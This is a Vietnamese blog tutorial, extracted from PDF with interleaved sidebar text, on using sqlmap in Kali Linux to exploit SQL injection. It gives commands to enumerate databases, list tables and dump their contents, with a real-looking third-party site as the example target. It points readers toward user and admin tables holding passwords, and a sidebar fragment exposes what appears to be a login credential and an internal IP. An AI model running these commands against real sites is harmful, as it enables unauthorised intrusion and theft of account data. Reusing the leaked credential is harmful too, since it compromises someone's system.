Professional Documents
Culture Documents
Hướng dẫn sử dụng sqlmap trong kali linux - THU DINH
Hướng dẫn sử dụng sqlmap trong kali linux - THU DINH
Search
OTHERS
"Trên con đường thành công, Không có dấu chân của kẻ lười biếng" --- Lỗ Tấn ---
ABOUT ME
Hướng dẫn sử dụng sqlmap trong Đinh Văn Thụ
FOLLOW BY EMAIL
Đầu tiên các bạn quét website xem có lỗi hay không. Với mình thì công cụ acunetix là công cụ
quét lỗi bảo mật trang web tốt nhất hiện nay. Nếu có lỗi sql injection thì xác định lỗi ở thông số
nào và có thể kiểm tra bằng cách vào trình duyệt gõ thêm ' vào cuối. Nếu trang web đó không
hiện được hình ảnh thì bị lỗi sql injection và chúng ta có thể khai thác bằng công cụ sqlmap trong POPULAR RECENT
kali linux.
+ Bước 1: Xuất ra tên của cơ sở dữ liệu: DVWA SQL Injection (low leve
sqlmap -u urltarget --dbs Bài này sẽ sử dụng 2 cách để kh
Ở đây tùy chọn -u là url của mục tiêu.
thác: 1. dùng tool sqlmap (nếu
--dbs là xuất ra tên cơ sở dữ liệu.
chưa biết, các bạn xem tại đây: huong-dan-
Ví dụ: sqlmap -u http://dacphuc.vn/?php=product_detail&id=227 --dbs
+ Bước 2: Khi đã có tên cơ sở dữ liệu, chúng ta có thể xem tên các bảng có trong cơ sở dữ liệu su-dung-sqlmap-trong-kali.ht...
đó bằng lệnh như sau:
sqlmap -u urltarget -D databasename --tables Basic command on router
-D: là tên của database juniper (Lệnh cơ bản Juniper)
--tables: để đưa ra tên của các bảng có trong cơ sở dữ liệu
Ví dụ: sqlmap -u http://dacphuc.vn/?php=product_detail&id=227 -D databasename --tables 1. Entering con guratio
+ Bước 3: Xem nội dung của các bảng trong cơ sở dữ liệu: mode on a Router, and exit
sqlmap -u urltarget -D databasename -T tablename --dump user@R1>con gure [edit] use.
-T: Đưa ra các bảng cần xem thông tin
--dump: dump ra để xem cơ sở dữ liệu của bảng đó.
Hướng dẫn sử dụng sqlmap
Ngoài ra các bạn có thể thêm một số tùy chọn như sau:
trong kali linux
-C: Danh sách các trường cần xem.
--table: cấu trúc của bảng về kiểu dữ liệu. Đầu tiên các bạn quét website
Như vậy các bạn đã có thể xem được cơ sở dữ liệu trong trang web bị lỗi sql injection. Những xem có lỗi hay không. Với mình thì công cụ
thông tin mà chúng ta thường khai thác như bảng liên quan đến user, admin, member. Những
acunetix là công cụ quét lỗi bảo mật trang
bảng này có thông tin về tài khoản và mật khẩu. Sẽ rất nguy hiểm nếu lưu không được mã hóa
và bị hacker chiếm được những thông tin này. web tốt nhất hiệ...
https://thudinh.blogspot.com/2017/10/huong-dan-su-dung-sqlmap-trong-kali.html 1/2
8/15/2020 Hướng dẫn sử dụng sqlmap trong kali linux - THU DINH
- cài trên logs.thudv.com - ip: 192.168.22.2
- login vào splunk = web:
admin/chip@102 - Để download
spl...
TOTAL PAGEVIEWS
https://thudinh.blogspot.com/2017/10/huong-dan-su-dung-sqlmap-trong-kali.html 2/2